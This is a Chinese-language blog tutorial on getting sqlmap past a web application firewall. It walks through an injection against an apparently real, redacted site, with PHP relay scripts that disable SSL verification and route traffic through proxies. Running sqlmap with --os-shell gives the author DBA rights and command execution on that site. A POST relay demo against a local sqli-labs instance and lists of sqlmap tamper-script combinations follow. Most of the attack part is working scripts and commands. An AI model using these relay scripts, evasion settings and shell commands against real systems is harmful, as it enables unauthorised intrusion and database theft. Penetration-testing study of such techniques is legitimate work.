<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="绕过WAF实战演示通过前期的信息收集发现存在注入的页面如下： ​ 直接使用sqlmap跑发现出现如下错误： 123456789101112131415python2 sqlmap.py -u &quot;http:&#x2F;&#x2F;xxxx?&amp;daxxtae&#x3D;null&amp;parame&#x3D;xxxxxx&quot; --batch --delay&#x3D;1 --random-agent        ___">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2025/05/20/Web/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/sqlmap/%E7%BB%95%E8%BF%87WAF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="绕过WAF实战演示通过前期的信息收集发现存在注入的页面如下： ​ 直接使用sqlmap跑发现出现如下错误： 123456789101112131415python2 sqlmap.py -u &quot;http:&#x2F;&#x2F;xxxx?&amp;daxxtae&#x3D;null&amp;parame&#x3D;xxxxxx&quot; --batch --delay&#x3D;1 --random-agent        ___">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/.com//image-20250519105437-67lcu06.png">
<meta property="og:image" content="http://example.com/.com//image-20250519105507-ukeg78l.png">
<meta property="og:image" content="http://example.com/.com//image-20250519105817-iacne5p.png">
<meta property="og:image" content="http://example.com/.com//image-20250519105913-j8otsss.png">
<meta property="og:image" content="http://example.com/.com//image-20250519105939-j5atbu9.png">
<meta property="og:image" content="http://example.com/.com//image-20250519105942-idplwtr.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110013-trheljz.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110300-nyf9oiz.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110715-qe4ru0n.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110742-cmuyky0.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110755-7sxmsol.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110828-p0favmb.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110836-i2fb0fc.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110843-hjlrfhm.png">
<meta property="og:image" content="http://example.com/.com//image-20250519110854-nljxinj.png">
<meta property="article:published_time" content="2025-05-20T00:55:54.000Z">
<meta property="article:modified_time" content="2025-05-20T00:55:54.000Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/.com//image-20250519105437-67lcu06.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-Web/工具使用/sqlmap/绕过WAF" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/05/20/Web/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/sqlmap/%E7%BB%95%E8%BF%87WAF/" class="article-date">
  <time class="dt-published" datetime="2025-05-20T00:55:54.000Z" itemprop="datePublished">2025-05-20</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="绕过WAF"><a href="#绕过WAF" class="headerlink" title="绕过WAF"></a>绕过WAF</h1><h1 id="实战演示"><a href="#实战演示" class="headerlink" title="实战演示"></a>实战演示</h1><p>通过前期的信息收集发现存在注入的页面如下：</p>
<p><img src="/.com//image-20250519105437-67lcu06.png" alt="image">​</p>
<p>直接使用sqlmap跑发现出现如下错误：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u <span class="string">&quot;http://xxxx?&amp;daxxtae=null&amp;parame=xxxxxx&quot;</span> --batch --delay=1 --random-agent</span><br><span class="line">        ___</span><br><span class="line">       __H__</span><br><span class="line"> ___ ___[<span class="string">&quot;]_____ ___ ___  &#123;1.5.4.7#dev&#125;</span></span><br><span class="line"><span class="string">|_ -| . [)]     | .&#x27;| . |</span></span><br><span class="line"><span class="string">|___|_  [&quot;</span>]_|_|_|__,|  _|</span><br><span class="line">      |_|V...       |_|   http://sqlmap.org</span><br><span class="line"></span><br><span class="line">[!] legal disclaimer: Usage of sqlmap <span class="keyword">for</span> attacking targets without prior mutual consent is illegal. It is the end user<span class="string">&#x27;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[*] starting @ 10:12:10 /2021-10-10/</span></span><br><span class="line"><span class="string">[10.12.10] [INFO] parsing HTTP request from &#x27;</span>49<span class="string">&#x27;</span></span><br><span class="line"><span class="string">custom injection marking character (&#x27;</span>*<span class="string">&#x27;) found in option &#x27;</span>--data<span class="string">&#x27;. Do you want to process it?  [Y/n/q]Y</span></span><br><span class="line"><span class="string">[10:12:10] [INFO] testing connection to the target URL</span></span><br><span class="line"><span class="string">[10:12:10] [CRITICAL] can&#x27;</span>t establish SSL connection</span><br></pre></td></tr></table></figure>

<p>一看无法建立SSL连接，好不容易发现一个注入点，难道就这样放弃了吗？先百度一波，看看SSL证书原理，就用一张图来理解更直接明了。</p>
<p><img src="/.com//image-20250519105507-ukeg78l.png" alt="image">​</p>
<p>那么遇到这样的情况要怎么绕呢？在sqlmap中没有<strong>绕过SSL证书的参数</strong>，思考了很长时间，终于想起来原来貌似有一个<strong>中转注入</strong>。这里要解决的第一个问题是<strong>有哪些脚本语言</strong>能够在<strong>请求网址时忽略SSL证书</strong>，第二个问题是我还需要使用sqlmap中的payload，这两个都要满足，通过查询了解到<strong>PHP可以使用参数来忽略SSL证书</strong>，由于并不是搞开发的，所以这里还是思考了很长时间，先来理解一下中转注入的原理吧。</p>
<h2 id="中转注入的原理"><a href="#中转注入的原理" class="headerlink" title="中转注入的原理"></a>中转注入的原理</h2><p>首先我们我们来分析一下sqlmap中转注入的原理，如下图：</p>
<p><img src="/.com//image-20250519105817-iacne5p.png" alt="image"></p>
<p>为了让大家更加容易解，先使用简单的脚本演示一遍，演示代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$payload=base64_encode($_GET[&#x27;x&#x27;]);//对中转脚本接收的参数进行base64编码</span><br><span class="line">echo $payload</span><br><span class="line">$urls=&quot;http://xxx/xxxx?q=1$payload&quot;;//对请求的网址拼接base64编码的字符串</span><br><span class="line">file_get_contents($urls);//请求目标网站</span><br><span class="line">echo $urls;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>网上随便找需一个后面有参数的网站，添加到$urls变量中，将上述代码放在本地服务器中，然后访问，可以看到成功请求到我们添加的网站</p>
<p><img src="/.com//image-20250519105913-j8otsss.png" alt="image"></p>
<p>使用sqlmap跑一下,设置一下代理使用burp来抓包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://127.0.0.1/zhongzhuan.php?x=1&quot;  -v 3 --proxy=http://127.0.0.1:8080</span><br></pre></td></tr></table></figure>

<p>成功看到各种payload</p>
<p><img src="/.com//image-20250519105939-j5atbu9.png" alt="image">​</p>
<p><img src="/.com//image-20250519105942-idplwtr.png" alt="image">​</p>
<p>burp抓包的结果</p>
<p><img src="/.com//image-20250519110013-trheljz.png" alt="image"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">set_time_limit(0); </span><br><span class="line"><span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&quot;id&quot;</span>]; </span><br><span class="line"><span class="variable">$id</span>=str_replace(<span class="string">&quot; &quot;</span>,<span class="string">&quot;/**/&quot;</span>,<span class="variable">$id</span>); </span><br><span class="line"><span class="variable">$id</span>=str_replace(<span class="string">&quot;=&quot;</span>,<span class="string">&quot;%3D&quot;</span>,<span class="variable">$id</span>); //这些编码机制可以自己的需求设定，毕竟实战的环境变换多样</span><br><span class="line"><span class="variable">$url</span> = <span class="string">&quot;http://xxxx?&amp;daxxtae=null&amp;parame=<span class="variable">$id</span>&quot;</span>;</span><br><span class="line"><span class="built_in">echo</span> <span class="variable">$url</span>;</span><br><span class="line"><span class="variable">$ch</span> = curl_init(); </span><br><span class="line">curl_setopt(<span class="variable">$ch</span>, CURLOPT_URL, <span class="string">&quot;<span class="variable">$url</span>&quot;</span>); </span><br><span class="line">curl_setopt(<span class="variable">$ch</span>, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书</span><br><span class="line">curl_setopt(<span class="variable">$ch</span>, CURLOPT_SSL_VERIFYHOST, FALSE);//https请求 不验证hosts</span><br><span class="line">curl_setopt(<span class="variable">$ch</span>, CURLOPT_RETURNTRANSFER, 1); // 函数执行如果成功只将结果返回，不自动输出任何内容。如果失败返回FALSE</span><br><span class="line">curl_setopt(<span class="variable">$ch</span>, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中，设置这个选项为一个非零值  </span><br><span class="line"><span class="variable">$output</span> = curl_exec(<span class="variable">$ch</span>); </span><br><span class="line">curl_close(<span class="variable">$ch</span>); </span><br><span class="line">print_r(<span class="variable">$output</span>);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>此时中转脚本已经写好了，用sqlmap跑，没想到呀，既然<strong>流量有限制</strong>，就算请求延迟调得很慢，还是直接将我的ip给封了，此时又是一个漫长的过程，又要继续思考了，在sqlmap中有代理设置参数，哈哈哈这都知道，但是试了试一试不可以，一直思考呀，首先我们借助了中转脚本，先请求的是我们的本地服务器，你说外网的代理服务器直接访问我本地服务器这是一个不现实的问题，最主要是我没有公网服务器，不然就好办了，所以现在需要思考两个问题，首先我要用到中转脚本过证书问题，还要能够使用代理，在PHP代码上使用代理池设置。此时sqlmap先请求我们中转脚本（并没有用代理地址），中转脚本借助设置的代理地址迟访问目标网页。<br>现在代码修改成了如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">set_time_limit(0); </span><br><span class="line">$id=$_GET[&quot;id&quot;]; </span><br><span class="line">$id=str_replace(&quot; &quot;,&quot;%20&quot;,$id); </span><br><span class="line">$id=str_replace(&quot;=&quot;,&quot;%3D&quot;,$id); </span><br><span class="line">$url = &quot;http://xxxx?&amp;daxxtae=null&amp;parame=$id&quot;;</span><br><span class="line">echo $url;</span><br><span class="line">$ch = curl_init(); </span><br><span class="line">curl_setopt($ch, CURLOPT_URL, &quot;$url&quot;); </span><br><span class="line">curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);</span><br><span class="line">curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);</span><br><span class="line">curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); </span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, 0);</span><br><span class="line">curl_setopt($ch, CURLOPT_PROXY, &#x27;proxy.xxxx.com&#x27;); //代理服务器地址</span><br><span class="line">curl_setopt($ch, CURLOPT_PROXYPORT, &#x27;8080&#x27;); //代理服务器端口</span><br><span class="line">$output = curl_exec($ch); </span><br><span class="line">curl_close($ch); </span><br><span class="line">print_r($output);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>在使用sqlmap跑的时候最好先本地测试一下，经过了20多分钟的扫描终于算是出东西了</p>
<p><img src="/.com//image-20250519110300-nyf9oiz.png" alt="image"></p>
<p>直接看一下能否写shell，搞个高危，运气就是这么好</p>
<p>​<code>python2 sqlmap.py -u &quot;http://xxxx?&amp;daxxtae=null&amp;param=xxx&quot; --batch --delay=1 --random-agent --os-shell</code>​</p>
<p>成功拿到了dba权限</p>
<p><img src="/.com//image-20250519110715-qe4ru0n.png" alt="image">​</p>
<p>成功执行命令，不过是真的慢，可能是有防护软件原因吧。</p>
<p><img src="/.com//image-20250519110742-cmuyky0.png" alt="image">​</p>
<p>在这里问题又来了，要是post型注入又该怎么办呢？上面的脚本似乎不在使用思考了很长时间，但是也没有在实际中遇到，所以这里就想本地尝试一次。</p>
<h1 id="post型中转注入"><a href="#post型中转注入" class="headerlink" title="post型中转注入"></a>post型中转注入</h1><p>在注入天书中有post型注入，随便选了一个11关卡，抓取less-11关的包，注入点在登录框这里。</p>
<p><img src="/.com//image-20250519110755-7sxmsol.png" alt="image">​</p>
<p>注入点为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=admin&amp;passwd=hhh&amp;submit=Submit</span><br></pre></td></tr></table></figure>

<p>构造中转脚本如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$url = &quot;http://192.168.1.104/sqli/Less-11/index.php&quot;;</span><br><span class="line">$sql = $_GET[s];//获取中转脚本传过来的payload </span><br><span class="line">$s = urlencode($sql);</span><br><span class="line">$params = &quot;uname=admin$s&amp;passwd=aa&quot;;</span><br><span class="line">$ch = curl_init();// 创建一个新cURL资源</span><br><span class="line"> curl_setopt($ch, CURLOPT_URL, $url);//这是你想用PHP取回的URL地址，可以在用curl_init()函数初始化时设置这个选项</span><br><span class="line">curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书</span><br><span class="line">curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);//https请求 不验证hosts</span><br><span class="line">curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数执行如果成功只将结果返回，不自动输出任何内容。如果失败返回FALSE</span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中，设置这个选项为一个非零值   </span><br><span class="line">curl_setopt($ch, CURLOPT_USERAGENT, &#x27;Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)&#x27;);// 在HTTP请求中自定义一个”user-agent”头的字符串</span><br><span class="line">curl_setopt($ch, CURLOPT_TIMEOUT, 15);//为了应对目标服务器的过载，下线，或者崩溃等可能状况。</span><br><span class="line">curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式</span><br><span class="line">curl_setopt($ch, CURLOPT_POSTFIELDS, $params);</span><br><span class="line">// 抓取URL并把它传递给浏览器 </span><br><span class="line">$output = curl_exec($ch);</span><br><span class="line">// 关闭cURL资源，并且释放系统资源</span><br><span class="line">curl_close($ch);</span><br><span class="line">$a = strlen($output);</span><br><span class="line">//echo $a;</span><br><span class="line">if($a==2846)&#123;</span><br><span class="line">    echo &quot;1&quot;;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &quot;2&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>使用sqlmap进行注入</p>
<p><img src="/.com//image-20250519110828-p0favmb.png" alt="image"></p>
<p>首先注入我们的中转脚本</p>
<p><img src="/.com//image-20250519110836-i2fb0fc.png" alt="image"></p>
<p>中转脚本通过获取的payload请求目标网站</p>
<p><img src="/.com//image-20250519110843-hjlrfhm.png" alt="image"></p>
<p>成功跑出数据库</p>
<p><img src="/.com//image-20250519110854-nljxinj.png" alt="image">​</p>
<p>‍</p>
<h1 id="sqlmap绕过WAF的思路总结"><a href="#sqlmap绕过WAF的思路总结" class="headerlink" title="sqlmap绕过WAF的思路总结"></a>sqlmap绕过WAF的思路总结</h1><p><strong>1、设置请求头</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--user-agent=&quot;Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0&quot;</span><br></pre></td></tr></table></figure>

<p><strong>2、设置代理</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--proxy=http://127.0.0.1:8080</span><br></pre></td></tr></table></figure>

<p><strong>3、设置延迟</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--delay=1</span><br></pre></td></tr></table></figure>

<p><strong>4、利用–tamper参数中的编码脚本</strong><br>常见编码搭配方式<br>普通tamper搭配方式:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes</span><br></pre></td></tr></table></figure>

<p>数据库为MYSQL的搭配方式:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes</span><br></pre></td></tr></table></figure>

<p>数据库为MySql的搭配方式:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor</span><br></pre></td></tr></table></figure>

<p><strong>5、自己编写中转脚本</strong></p>
<p>‍</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/05/20/Web/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/sqlmap/%E7%BB%95%E8%BF%87WAF/" data-id="cmawczpo6002kik7kc6no6ypt" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/05/20/Web/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2025/05/20/Web/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/xsstrike/%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Web/">Web</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Web/HTTP%E6%95%99%E7%A8%8B/">HTTP教程</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/PHP%E5%AE%89%E5%85%A8/">PHP安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/XSS/">XSS</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/">注入漏洞</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></li></ul></li></ul></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CSRF/" rel="tag">CSRF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF%E9%A2%98%E7%9B%AE/" rel="tag">CTF题目</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Content-Type/" rel="tag">Content-Type</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTTP/" rel="tag">HTTP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTTPS/" rel="tag">HTTPS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSTI/" rel="tag">SSTI</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSStrike/" rel="tag">XSStrike</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/labs/" rel="tag">labs</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AE%9E%E6%88%98/" rel="tag">实战</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5/" rel="tag">对象注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" rel="tag">报错注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/" rel="tag">数据库</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" rel="tag">模板注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%AF%94%E8%BE%83%E6%BC%8F%E6%B4%9E/" rel="tag">比较漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/" rel="tag">网络协议</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag">网络安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC/" rel="tag">跨站脚本</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CSRF/" style="font-size: 10px;">CSRF</a> <a href="/tags/CTF%E9%A2%98%E7%9B%AE/" style="font-size: 10px;">CTF题目</a> <a href="/tags/Content-Type/" style="font-size: 10px;">Content-Type</a> <a href="/tags/HTTP/" style="font-size: 13.33px;">HTTP</a> <a href="/tags/HTTPS/" style="font-size: 10px;">HTTPS</a> <a href="/tags/PHP/" style="font-size: 16.67px;">PHP</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 13.33px;">SQL注入</a> <a href="/tags/SSTI/" style="font-size: 10px;">SSTI</a> <a href="/tags/XSS/" style="font-size: 20px;">XSS</a> <a href="/tags/XSStrike/" style="font-size: 10px;">XSStrike</a> <a href="/tags/labs/" style="font-size: 10px;">labs</a> <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 13.33px;">反序列化</a> <a href="/tags/%E5%AE%89%E5%85%A8/" style="font-size: 13.33px;">安全</a> <a href="/tags/%E5%AE%9E%E6%88%98/" style="font-size: 10px;">实战</a> <a href="/tags/%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">对象注入</a> <a href="/tags/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">报错注入</a> <a href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/" style="font-size: 10px;">数据库</a> <a href="/tags/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">模板注入</a> <a href="/tags/%E6%AF%94%E8%BE%83%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">比较漏洞</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 10px;">渗透测试</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/" style="font-size: 10px;">网络协议</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" style="font-size: 10px;">网络安全</a> <a href="/tags/%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC/" style="font-size: 10px;">跨站脚本</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/05/">May 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/05/">May 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/04/">April 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/05/20/Web/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/xsstrike/">(no title)</a>
